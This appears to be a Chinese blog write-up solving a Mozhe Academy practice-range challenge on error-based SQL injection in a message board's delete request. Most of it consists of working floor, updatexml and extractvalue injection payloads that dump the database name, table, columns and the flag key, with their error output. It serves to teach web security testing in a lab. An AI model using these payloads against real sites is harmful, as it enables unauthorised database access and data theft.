【墨者學院】--SQL注入漏洞測試(delete注入)

原創 凉拌花生米 2018-12-07 16:04

背景介紹

最近有人匿名給工程師留言說,感謝他的辛勤付出,把墨者學院建設的這麼好,不料激發了工程師對留言板的一波操作,輕鬆查到了這個人的身份。

實訓目標

1、熟練掌握留言板的工作原理;
2、善用burp抓取數據包;

解題方向

抓取數據包加以分析。
靶場

1、判斷注入類型

在?Id=62後面輸入單引號報錯,初步判定存在報錯型注入,報錯型注入的方法大概有10種左右,這裏分別使用floor、updatexml和extractvalue三種方法。其他的exp、multipoint貌似不太行。

2、獲取當前數據庫信息
and (select 1 from(select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2)) as a from information_schema.columns group by a)b)
==============================================================================
and (updatexml(1,concat(0x7e,(select database()),0x7e),1))
==============================================================================
and (extractvalue(1, concat(0x5c,(select database()))))
==============================================================================

得到數據庫爲“pikaqiu”
XPATH syntax error: ‘\pikaqiu’

3、獲取數據庫中表
and (select 1 from(select count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema='
pikaqiu'),0x3a,0x3a,floor(rand()*2)) as a from information_schema.columns group by a)b)
==============================================================================
and (updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='pikaqiu'),0x7e),1))
==============================================================================
and (extractvalue(1, concat(0x5c,(select table_name from information_schema.tables where table_schema='pikaqiu'))))

XPATH syntax error: ‘\message’
得到“message”表

4、獲取表中列信息
and (select 1 from(select count(*),concat(0x3a,0x3a,(select column_name from information_schema.columns where table_name='message' limit 3,1),0x3a,0x3a,floor(rand()*2)) as a from information_schema.columns group by a)b)
==============================================================================
and (updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='message' limit 3,1),0x7e),1))
==============================================================================
and (extractvalue(1, concat(0x5c,(select column_name from information_schema.columns where table_name='message' limit 3,1))))

調整limit第一位數字得到列:“id”“content”“key” "time“
XPATH syntax error: ‘\key’

5、獲取key值
and (select 1 from(select count(*),concat(0x3a,0x3a,(SELECT concat_ws(':', `key`) FROM message limit 0,1)),0x3a,0x3a,floor(rand()*2)) as a from information_schema.columns group by a)b)
==============================================================================
and (updatexml(1,concat(0x7e,(SELECT concat_ws(':', `key`) FROM message limit 0,1),0x7e),1))
==============================================================================
and extractvalue(1,concat(0x5c,(SELECT concat_ws(':', `key`) FROM message limit 0,1)))
==============================================================================

得到key值:
XPATH syntax error: ‘\mozheb18e10d2fbffaffbb315bf22d2’

6、總結

總結:在獲取key值的時候使用floor方法無法獲取到,不知道是啥原因,另外兩種方法在concat_ws()裏面必須添加‘:’字段,不明白爲什麼。

另外:
sqlmap是跑不出來key值的。。。
sqlmap是跑不出來key值的。。。
sqlmap是跑不出來key值的。。。

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

【墨者學院】Tomcat後臺弱口令漏洞利用

背景介紹 “墨者”安全工程師發現某個基於Tomcat的Web服務器後臺存在漏洞,你也一起來學習吧。 實訓目標 1、瞭解Tomcat服務器的基本操作; 2、瞭解Tomcat服務器War包部署功能; 解題方向 網站常用後臺弱密碼登錄,

凉拌花生米 2020-06-21 21:16:06

【墨者學院】SQL注入漏洞測試(delete注入)

背景介紹 最近有人匿名給工程師留言說,感謝他的辛勤付出,把墨者學院建設的這麼好,不料激發了工程師對留言板的一波操作,輕鬆查到了這個人的身份。 實訓目標 1、熟練掌握留言板的工作原理; 2、善用burp抓取數據包; 解題方向 抓取數

凉拌花生米 2020-06-21 21:16:06

【墨者學院】SQL手工注入漏洞測試(Access數據庫)

背景介紹 安全工程師"墨者"最近在練習SQL手工注入漏洞,自己剛搭建好一個靶場環境IIS+ASP+Access,Aspx代碼對客戶端提交的參數未做任何過濾。盡情的練習SQL手工注入吧。 實訓目標 1.掌握SQL注入原理; 2.瞭解

凉拌花生米 2020-06-21 21:16:05

【墨者學院】CMS系統漏洞分析溯源(第6題)

凉拌花生米 2018-12-23 15:58:14

【墨者學院】--SQL手工注入漏洞測試(Access數據庫)

凉拌花生米 2018-12-07 14:18:07

【墨者學院】--Tomcat後臺弱口令漏洞利用

凉拌花生米 2018-12-07 14:18:07

【墨者學院】主機溢出提權漏洞分析

凉拌花生米 2018-12-07 14:18:07